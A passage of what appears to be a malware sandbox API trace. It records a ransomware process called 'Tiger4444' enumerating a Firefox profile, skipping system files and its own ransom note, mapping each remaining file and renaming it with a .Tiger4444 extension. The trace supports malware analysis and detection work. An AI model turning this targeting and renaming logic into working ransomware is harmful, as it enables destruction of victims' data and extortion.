[0051.106] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\prefs.js" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\prefs.js"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.107] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.107] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14255981528) returned 1 [0051.107] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=8141) returned 1 [0051.107] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0051.107] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0051.107] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x22d0, lpName=0x0) returned 0x2c8 [0051.108] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x22d0) returned 0xbe0000 [0051.127] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0051.127] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0051.127] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0051.128] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0051.128] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0051.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0051.128] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14258096865) returned 1 [0051.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0051.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0051.128] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.128] CloseHandle (hObject=0x2c8) returned 1 [0051.128] CloseHandle (hObject=0x260) returned 1 [0051.128] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\prefs.js.Tiger4444") returned 92 [0051.128] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\prefs.js" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\prefs.js"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\prefs.js.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\prefs.js.tiger4444"), dwFlags=0x1) returned 1 [0051.129] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1472dc0f, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb8403501, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8d8cb9a, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="saved-telemetry-pings", cAlternateFileName="SAVED-~1")) returned 1 [0051.129] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.129] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.129] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="Tiger4444.exe") returned -1 [0051.129] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2=".") returned 1 [0051.129] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="..") returned 1 [0051.129] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="windows") returned -1 [0051.129] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="bootmgr") returned 1 [0051.129] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="pagefile.sys") returned 1 [0051.129] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="boot") returned 1 [0051.129] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="ids.txt") returned 1 [0051.129] lstrcmpiW (lpString1="saved-telemetry-pings", lpString2="NTUSER.DAT") returned 1 [0051.129] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="saved-telemetry-pings" | out: lpString1="saved-telemetry-pings") returned="saved-telemetry-pings" [0051.129] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66360 [0051.129] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xc0) returned 0xc61df8 [0051.129] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66368 | out: ListHead=0xc66828, ListEntry=0xc66368) returned 0xc66348 [0051.129] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4731d65, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4731d65, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x47330f8, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x36e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="search.json.mozlz4", cAlternateFileName="SEARCH~1.MOZ")) returned 1 [0051.130] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.130] lstrcmpiW (lpString1="search.json.mozlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.130] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="Tiger4444.exe") returned -1 [0051.130] lstrcmpiW (lpString1="search.json.mozlz4", lpString2=".") returned 1 [0051.130] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="..") returned 1 [0051.130] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="windows") returned -1 [0051.130] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="bootmgr") returned 1 [0051.130] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="pagefile.sys") returned 1 [0051.130] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="boot") returned 1 [0051.130] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="ids.txt") returned 1 [0051.130] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="NTUSER.DAT") returned 1 [0051.130] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="search.json.mozlz4" | out: lpString1="search.json.mozlz4") returned="search.json.mozlz4" [0051.130] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\search.json.mozlz4", dwFileAttributes=0x0) returned 1 [0051.131] lstrlenW (lpString="search.json.mozlz4") returned 18 [0051.131] lstrlenW (lpString="Tiger4444") returned 9 [0051.131] lstrcmpiW (lpString1="on.mozlz4", lpString2="Tiger4444") returned -1 [0051.131] lstrlenW (lpString=".dll") returned 4 [0051.131] lstrcmpiW (lpString1="zlz4", lpString2=".dll") returned 1 [0051.131] lstrlenW (lpString=".lnk") returned 4 [0051.131] lstrcmpiW (lpString1="zlz4", lpString2=".lnk") returned 1 [0051.131] lstrlenW (lpString=".ini") returned 4 [0051.131] lstrcmpiW (lpString1="zlz4", lpString2=".ini") returned 1 [0051.131] lstrlenW (lpString=".sys") returned 4 [0051.131] lstrcmpiW (lpString1="zlz4", lpString2=".sys") returned 1 [0051.131] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\search.json.mozlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\search.json.mozlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.131] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.131] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14258431343) returned 1 [0051.131] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=14056) returned 1 [0051.131] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0051.131] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71fb0 [0051.131] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x39f0, lpName=0x0) returned 0x2c8 [0051.132] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x39f0) returned 0xbe0000 [0051.145] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0051.145] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0051.145] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0051.145] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0051.145] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0051.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0051.146] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14259901547) returned 1 [0051.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0051.146] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71fb0 | out: hHeap=0xc50000) returned 1 [0051.146] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.146] CloseHandle (hObject=0x2c8) returned 1 [0051.146] CloseHandle (hObject=0x260) returned 1 [0051.146] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\search.json.mozlz4.Tiger4444") returned 102 [0051.146] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\search.json.mozlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\search.json.mozlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\search.json.mozlz4.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\search.json.mozlz4.tiger4444"), dwFlags=0x1) returned 1 [0051.148] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe5f9955, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe5f9955, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfe645e15, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="secmod.db", cAlternateFileName="")) returned 1 [0051.148] lstrcmpiW (lpString1="secmod.db", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.148] lstrcmpiW (lpString1="secmod.db", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.148] lstrcmpiW (lpString1="secmod.db", lpString2="Tiger4444.exe") returned -1 [0051.148] lstrcmpiW (lpString1="secmod.db", lpString2=".") returned 1 [0051.148] lstrcmpiW (lpString1="secmod.db", lpString2="..") returned 1 [0051.148] lstrcmpiW (lpString1="secmod.db", lpString2="windows") returned -1 [0051.148] lstrcmpiW (lpString1="secmod.db", lpString2="bootmgr") returned 1 [0051.148] lstrcmpiW (lpString1="secmod.db", lpString2="pagefile.sys") returned 1 [0051.148] lstrcmpiW (lpString1="secmod.db", lpString2="boot") returned 1 [0051.148] lstrcmpiW (lpString1="secmod.db", lpString2="ids.txt") returned 1 [0051.148] lstrcmpiW (lpString1="secmod.db", lpString2="NTUSER.DAT") returned 1 [0051.148] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="secmod.db" | out: lpString1="secmod.db") returned="secmod.db" [0051.148] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\secmod.db", dwFileAttributes=0x0) returned 1 [0051.149] lstrlenW (lpString="secmod.db") returned 9 [0051.149] lstrlenW (lpString="Tiger4444") returned 9 [0051.149] lstrcmpiW (lpString1="secmod.db", lpString2="Tiger4444") returned -1 [0051.149] lstrlenW (lpString=".dll") returned 4 [0051.149] lstrcmpiW (lpString1="d.db", lpString2=".dll") returned 1 [0051.149] lstrlenW (lpString=".lnk") returned 4 [0051.149] lstrcmpiW (lpString1="d.db", lpString2=".lnk") returned 1 [0051.149] lstrlenW (lpString=".ini") returned 4 [0051.149] lstrcmpiW (lpString1="d.db", lpString2=".ini") returned 1 [0051.149] lstrlenW (lpString=".sys") returned 4 [0051.149] lstrcmpiW (lpString1="d.db", lpString2=".sys") returned 1 [0051.149] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\secmod.db" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\secmod.db"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.149] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.149] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14260234422) returned 1 [0051.149] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=16384) returned 1 [0051.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0051.149] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0051.149] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x2c8 [0051.151] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0xbe0000 [0051.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0051.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0051.155] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0051.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0051.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.155] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0051.155] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.155] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0051.155] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14260856103) returned 1 [0051.156] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0051.156] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0051.156] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.156] CloseHandle (hObject=0x2c8) returned 1 [0051.156] CloseHandle (hObject=0x260) returned 1 [0051.156] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\secmod.db.Tiger4444") returned 93 [0051.156] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\secmod.db" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\secmod.db"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\secmod.db.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\secmod.db.tiger4444"), dwFlags=0x1) returned 1 [0051.156] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143f0f49, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x143f0f49, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xb81085d6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SecurityPreloadState.txt", cAlternateFileName="SECURI~1.TXT")) returned 1 [0051.156] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.157] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.157] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="Tiger4444.exe") returned -1 [0051.157] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2=".") returned 1 [0051.157] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="..") returned 1 [0051.157] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="windows") returned -1 [0051.157] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="bootmgr") returned 1 [0051.157] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="pagefile.sys") returned 1 [0051.157] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="boot") returned 1 [0051.157] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="ids.txt") returned 1 [0051.157] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="NTUSER.DAT") returned 1 [0051.157] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="SecurityPreloadState.txt" | out: lpString1="SecurityPreloadState.txt") returned="SecurityPreloadState.txt" [0051.157] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\SecurityPreloadState.txt", dwFileAttributes=0x0) returned 1 [0051.157] lstrlenW (lpString="SecurityPreloadState.txt") returned 24 [0051.157] lstrlenW (lpString="Tiger4444") returned 9 [0051.158] lstrcmpiW (lpString1="State.txt", lpString2="Tiger4444") returned -1 [0051.158] lstrlenW (lpString=".dll") returned 4 [0051.158] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0051.158] lstrlenW (lpString=".lnk") returned 4 [0051.158] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0051.158] lstrlenW (lpString=".ini") returned 4 [0051.158] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0051.158] lstrlenW (lpString=".sys") returned 4 [0051.158] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0051.158] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e0d6ab, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb8154a58, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8154a58, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sessionCheckpoints.json", cAlternateFileName="SESSIO~1.JSO")) returned 1 [0051.158] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.158] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.158] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="Tiger4444.exe") returned -1 [0051.158] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2=".") returned 1 [0051.158] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="..") returned 1 [0051.158] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="windows") returned -1 [0051.158] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="bootmgr") returned 1 [0051.158] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="pagefile.sys") returned 1 [0051.158] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="boot") returned 1 [0051.158] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="ids.txt") returned 1 [0051.158] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="NTUSER.DAT") returned 1 [0051.158] lstrcpyW (in: lpString1=0x30aeb3c, lpString2="sessionCheckpoints.json" | out: lpString1="sessionCheckpoints.json") returned="sessionCheckpoints.json" [0051.158] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionCheckpoints.json", dwFileAttributes=0x0) returned 1 [0051.159] lstrlenW (lpString="sessionCheckpoints.json") returned 23 [0051.159] lstrlenW (lpString="Tiger4444") returned 9 [0051.159] lstrcmpiW (lpString1="ints.json", lpString2="Tiger4444") returned -1 [0051.159] lstrlenW (lpString=".dll") returned 4 [0051.159] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0051.159] lstrlenW (lpString=".lnk") returned 4 [0051.159] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0051.159] lstrlenW (lpString=".ini") returned 4 [0051.159] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0051.159] lstrlenW (lpString=".sys") returned 4 [0051.159] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0051.159] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionCheckpoints.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessioncheckpoints.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0051.159] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0051.159] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14261226907) returned 1 [0051.159] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=288) returned 1 [0051.159] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0051.159] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0051.159] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x420, lpName=0x0) returned 0x2c8 [0051.161] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x420) returned 0xbe0000 [0051.163] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0051.163] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0051.163] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0051.163] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0051.163] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0051.163] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0051.163] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0051.163] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0051.163] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14261609679) returned 1 [0051.163] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0051.163] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0051.163] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0051.163] CloseHandle (hObject=0x2c8) returned 1 [0051.163] CloseHandle (hObject=0x260) returned 1 [0051.163] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionCheckpoints.json.Tiger4444") returned 107 [0051.163] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionCheckpoints.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessioncheckpoints.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionCheckpoints.json.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessioncheckpoints.json.tiger4444"), dwFlags=0x1) returned 1 [0051.164] FindNextFileW (in: hFindFile=0xc73148, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6368e07, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7794358d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb7ea601f, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sessionstore-backups", cAlternateFileName="SESSIO~1")) returned 1 [0051.164] lstrcmpiW 